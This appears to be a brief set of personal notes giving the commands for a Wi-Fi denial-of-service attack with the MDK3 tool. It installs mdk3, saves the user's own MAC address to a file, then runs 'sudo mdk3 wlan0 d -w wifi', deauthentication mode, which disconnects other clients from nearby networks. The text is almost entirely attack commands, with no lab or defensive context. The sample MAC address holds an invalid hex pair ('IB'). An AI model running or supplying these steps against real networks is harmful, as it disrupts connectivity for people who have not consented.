# MDK3

install
```
sudo apt install mdk3 -y
```

check mac address
```
/sbin/ifconfig
```
copy mac address, create file wifi
```
15:AB:9F:IB:0A:00
```
go to home directory
```
vi wifi
```
and paste mac address


run attack
```
sudo mdk3 wlan0 d -w wifi
```